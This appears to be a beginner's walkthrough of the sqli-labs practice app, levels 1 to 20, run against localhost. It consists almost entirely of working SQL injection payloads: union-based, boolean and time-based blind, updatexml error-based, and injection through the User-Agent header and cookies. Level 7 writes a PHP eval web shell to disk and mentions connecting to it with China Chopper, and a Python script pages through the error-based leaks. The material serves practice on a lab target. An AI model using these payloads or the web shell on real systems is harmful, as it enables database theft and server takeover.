Note: some of the payloads may contain full-width (Chinese) punctuation that stops the command from working; watch out for that when copying.
Database name: database()
Database version: version()
Database user: user()
Operating system: @@version_compile_os
System user: system_user()
Current user: current_user()
User who opened the session: session_user()
Data directory: @@datadir
MySQL install directory: @@basedir
Table holding all table names: information_schema.tables
Table name column: table_name
Database name column: table_schema
Column name column: column_name
Table holding all column names: information_schema.columns
Workflow: find the injection point -> decide whether the parameter is numeric or string -> find the column count -> find which columns are displayed -> get the database name -> get the table names -> get the column names -> dump the column data. Union-based injection, blind injection and the rest all follow these same steps with minor variations.
Level 1
http://localhost/sqli-labs-master/Less-1/?id=1' -- -
http://localhost/sqli-labs-master/Less-1/?id=1' and 1=1-- -
http://localhost/sqli-labs-master/Less-1/?id=1' and 1=2-- -
http://localhost/sqli-labs-master/Less-1/?id=1' order by 3-- -
http://localhost/sqli-labs-master/Less-1/?id=1' order by 4-- -
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3-- -
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,database(),user()-- -
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3-- -
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),3-- -
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(concat_ws(':',id,username,password)) from users),3-- -
(The first argument of concat_ws() is the separator; passing id there would print username and password glued together by the id value, so a literal separator is used.)
Level 2 is also union-based injection, the same as the previous level; only the closure differs (the parameter is numeric, so no quote is needed).
http://localhost/sqli-labs-master/Less-2/?id=1 and 1=1
http://localhost/sqli-labs-master/Less-2/?id=1 and 1=2
http://localhost/sqli-labs-master/Less-2/?id=1 order by 3
http://localhost/sqli-labs-master/Less-2/?id=1 order by 4
http://localhost/sqli-labs-master/Less-2/?id=1 union select 1,2,3
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,database(),user()
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),3
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(concat_ws(':',id,username,password)) from users),3
Level 3 is union-based injection as well, differing only in the closure (a single quote inside parentheses). Only the injection-point test is shown here; the rest is identical to the two levels above.
http://localhost/sqli-labs-master/Less-3/?id=1'
http://localhost/sqli-labs-master/Less-3/?id=1') and 1=1-- -
http://localhost/sqli-labs-master/Less-3/?id=1') and 1=2-- -
Level 4 again differs only in the closure (a double quote inside parentheses); everything else is the same as the previous levels.
http://localhost/sqli-labs-master/Less-4/?id=1'
http://localhost/sqli-labs-master/Less-4/?id=1"
http://localhost/sqli-labs-master/Less-4/?id=1") and 1=1-- -
http://localhost/sqli-labs-master/Less-4/?id=1") and 1=2-- -
Level 5 is boolean-based blind injection. Boolean blind is tedious and needs patience; tools or scripts help, but I'm still a beginner who can't write scripts yet and will learn that over time. In this level a true condition returns "You are in ..." and a false one returns nothing. Enough talk, let's go.
http://localhost/sqli-labs-master/Less-5/?id=1' -- -
http://localhost/sqli-labs-master/Less-5/?id=1' and 1=1-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and 1=2-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and length(database())<10-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and length(database())=8-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and ascii(substr(database(),1,1))>70-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and ascii(substr(database(),1,1))=115-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and ascii(substr(database(),2,1))=101-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and (select count(*) from information_schema.tables where table_schema="security")>3-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and (select count(*) from information_schema.tables where table_schema="security")=4-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and (select length(table_name) from information_schema.tables where table_schema="security" limit 0,1)>5-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and (select length(table_name) from information_schema.tables where table_schema="security" limit 0,1)=6-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>70-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=101-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and (select count(*) from information_schema.columns where table_schema="security" and table_name="users")=3-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and (select length(column_name) from information_schema.columns where table_schema="security" and table_name="users" limit 0,1)=2-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),1,1))=105-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and length((select username from users limit 0,1))=4-- -
http://localhost/sqli-labs-master/Less-5/?id=1' and ascii(substr((select username from users limit 0,1),1,1))=68-- -
Level 6 is really the same as the previous level, except that the closure is a double quote.
http://localhost/sqli-labs-master/Less-6/?id=1"-- -
http://localhost/sqli-labs-master/Less-6/?id=1" and 1=1-- -
http://localhost/sqli-labs-master/Less-6/?id=1" and 1=2-- -
Level 7 (closure is a single quote inside two parentheses; the page only tells you whether the query succeeded, so the payload writes a file instead of displaying data):
http://localhost/sqli-labs-master/Less-7/?id=1'))-- -
http://localhost/sqli-labs-master/Less-7/?id=1')) and 1=1-- -
http://localhost/sqli-labs-master/Less-7/?id=1')) and 1=2-- -
http://localhost/sqli-labs-master/Less-7/?id=1')) order by 3-- -
http://localhost/sqli-labs-master/Less-7/?id=1')) union select 1,2,3-- -
http://localhost/sqli-labs-master/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["crow"]);?>' into outfile "C:/phpStudy/PHPTutorial/MySQL/data/test.php"-- -
Write the Windows path with forward slashes (or doubled backslashes): inside a MySQL string literal a backslash is an escape character, so "\t" in "\test.php" would become a tab. For the write to succeed, the target directory must be permitted by secure_file_priv and writable by the MySQL service account, and the file must land in a directory the web server actually serves, otherwise the shell cannot be reached.
Then connect to the shell with China Chopper (中国菜刀).
Level 8 is also boolean-based blind injection; the closure is a single quote and everything else is the same as level 5.
Level 9 is time-based blind injection.
http://localhost/sqli-labs-master/Less-9/?id=1'
http://localhost/sqli-labs-master/Less-9/?id=1' and sleep(5)-- -
http://localhost/sqli-labs-master/Less-9/?id=1' and if(length(database())=8,sleep(8),1)-- -
When the length really is 8 the page takes about eight seconds to load; for any other value it returns immediately. The delay is the only signal, so for each payload below note which branch of if() holds the sleep(): in the next two a true condition sleeps, in the last three a true condition returns at once and a false one sleeps.
http://localhost/sqli-labs-master/Less-9/?id=1' and if(ascii(substr(database(),1,1))>50,sleep(10),0)-- -
http://localhost/sqli-labs-master/Less-9/?id=1' and if(ascii(substr(database(),2,1))>50,sleep(10),0)-- -
http://localhost/sqli-labs-master/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>120,1,sleep(10))-- -
http://localhost/sqli-labs-master/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=115,1,sleep(10))-- -
http://localhost/sqli-labs-master/Less-9/?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=75,1,sleep(10))-- -
Level 10 is also time-based blind injection; apart from the closure being a double quote it is identical to level 9.
Level 11 is a login form, and it is again union-based injection. Enter 1' or 1=1-- - in the login box; if the login succeeds the closure is a single quote.
-1' order by 3-- -
-1' union select 1,2-- -
-1' union select 1,database()-- -
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -
-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'-- -
-1' union select 1,(select group_concat(concat_ws(':',id,username,password)) from users)-- -
Level 12 is identical to level 11 except that the closure is "). A shortcut: add the following two lines to each level's code: echo $sql; echo ""; Then submit id=1 or log in as admin and the page prints the assembled query, which shows the closure directly. I'd suggest working out the first few levels yourself; after that you can cheat a bit, hehe!
Levels 13, 14, 15 and 16 can all be done with blind injection; the detailed method is written up under level 13 (closure: single quote inside parentheses, comment with #).
uname=admin') or 1=1#&passwd=admin&submit=Submit
uname=admin') or if(length(database())=8,1,sleep(5))#&passwd=admin&submit=Submit
uname=admin') or left(database(),1)>'a'#&passwd=admin&submit=Submit
uname=admin') or left(database(),1)='s'#&passwd=admin&submit=Submit
uname=admin') or left(database(),8)='security'#&passwd=admin&submit=Submit
uname=admin') or left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='u'#&passwd=admin&submit=Submit
uname=admin') or left((select table_name from information_schema.tables where table_schema=database() limit 0,1),5)='users'#&passwd=admin&submit=Submit
uname=admin') or left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),2)='id'#&passwd=admin&submit=Submit
uname=admin') or left((select id from users limit 0,1),1)='1'#&passwd=admin&submit=Submit
Level 14 differs from level 13 only in the closure, a double quote.
Level 15 differs from level 13 only in the closure, a single quote.
Level 16 differs from level 13 only in the closure, a double quote plus parenthesis ").
Level 17 introduces a small piece of knowledge: the updatexml() function (look it up if you are curious). Its second argument must be a valid XPath expression; when it is not, MySQL raises an "XPATH syntax error" that echoes the offending string, so wrapping a subquery in 0x7e (~) leaks its result through the error message. Syntax: select updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),1);
uname=admin&passwd=admin&submit=Submit
uname=admin&passwd=asdf&submit=Submit
uname=admin'#&passwd=asdf&submit=Submit
Here our single quote in the username is escaped, so only the password field can be injected.
uname=admin&passwd=asdf' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)#&submit=Submit
uname=admin&passwd=asdf' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1)#&submit=Submit
uname=admin&passwd=asdf' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1)),1)#&submit=Submit
uname=admin&passwd=asdf' and updatexml(1,concat(0x7e,(select id from emails limit 0,1)),1)#&submit=Submit
Before level 18 I recommend resetting the database, because level 17 changed the admin password. If you don't reset, you can log in with the password set in level 17 instead; either way works.
uname=admin'#&passwd=admin'#&submit=Submit
Here both the username and the password are escaped, so the earlier approach doesn't work. This level injects through the User-Agent header; I used the Firefox extension ModHeader to set it.
' or updatexml(1,concat(0x7e,(database())),1) or '1'='1
uname=admin&passwd=admin&submit=Submit
' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1) or '1'='1#
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1) or '1'='1#
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 1,1)),1) or '1'='1#
' or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1) or '1'='1#
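The updatexml() payloads for levels 17 and 18 work because MySQL echoes the bad XPath string in its error message, but that message reproduces at most 32 characters of the string (31 after the leading ~), so a long value such as group_concat() of every username comes back cut off. The following script is an added example, not part of the walkthrough: it pages through the value with substr(...,START,31) windows and stitches the pieces together. The transport is left to a send(payload) callable so the same code serves the password field (level 17) and the User-Agent header (level 18); the closing quote, the regex on the error text and the offline stand-in are assumptions for the example, with the stand-in modelled on MySQL's real "XPATH syntax error: '...'" message.

```python
"""Error-based extraction with updatexml() for sqli-labs Less-17/18.
Payload shape (walkthrough's own, plus a substr() window):
    ' and updatexml(1,concat(0x7e,substr((EXPR),START,31)),1)#
MySQL's XPATH error shows at most 32 characters, hence 31-character windows after ~."""
import re

XPATH_RE = re.compile(r"XPATH syntax error: '~(.*?)'")
WINDOW = 31  # 32-character error limit minus the leading ~ marker


def build_payload(expr, start, close="'"):
    """One window of the value of `expr`, starting at 1-based offset `start`."""
    return (f"{close} and updatexml(1,concat(0x7e,"
            f"substr(({expr}),{start},{WINDOW})),1)#")


def parse_leak(body):
    """Pull the leaked text out of the page; None if no XPATH error is present."""
    m = XPATH_RE.search(body)
    return m.group(1) if m else None


def extract(send, expr, close="'"):
    """send(payload) -> response body. Walks windows until a short one ends the value."""
    pieces, start = [], 1
    while True:
        chunk = parse_leak(send(build_payload(expr, start, close)))
        if chunk is None:
            raise RuntimeError("response carried no XPATH error; check the closure")
        pieces.append(chunk)
        if len(chunk) < WINDOW:          # a short (or empty) window means we are done
            return "".join(pieces)
        start += WINDOW


# --- offline stand-in for the vulnerable form (constructed, not a real target) ------
_PAYLOAD_RE = re.compile(r"substr\(\((.*)\),(\d+),(\d+)\)")


def make_fake_send(values):
    """Return the error page MySQL would produce, truncated to 32 chars like the server."""
    def send(payload):
        m = _PAYLOAD_RE.search(payload)
        s, start, n = values[m.group(1)], int(m.group(2)), int(m.group(3))
        bad_xpath = "~" + s[start - 1:start - 1 + n]
        return f"XPATH syntax error: '{bad_xpath[:32]}'"
    return send


USERS_EXPR = "select group_concat(username) from users"
# Constructed sample: the eight usernames shipped with the sqli-labs 'security' database.
FAKE_USERS = "Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin"

if __name__ == "__main__":
    send = make_fake_send({USERS_EXPR: FAKE_USERS})
    print(extract(send, USERS_EXPR))  # Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin
    # Against the real Less-17 form, send() would POST
    #   uname=admin&passwd=<payload>&submit=Submit
    # and return the response body; for Less-18 it would put the payload in User-Agent.
```

Without the windowing, the single payload from the walkthrough shows only the first 31 characters and silently drops the rest, which is easy to miss when the visible part looks complete. The stop condition is a window shorter than 31 characters, so a value whose length is an exact multiple of 31 costs one extra request that returns an empty window.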
Level 19 is the same as level 18.
Level 20: log in as admin. From the title we learn this level is cookie injection; I used the Firefox extension Cookie-Editor. Remember to save after each payload you enter, otherwise it has no effect. Use Cookie-Editor to check for the vulnerability, setting the uname cookie to each of the following:
' union select 1,2,3#
' union select 1,2,database()#
-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')-- -
-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')#
-1' union select 1,2,group_concat(id,username,password) from users#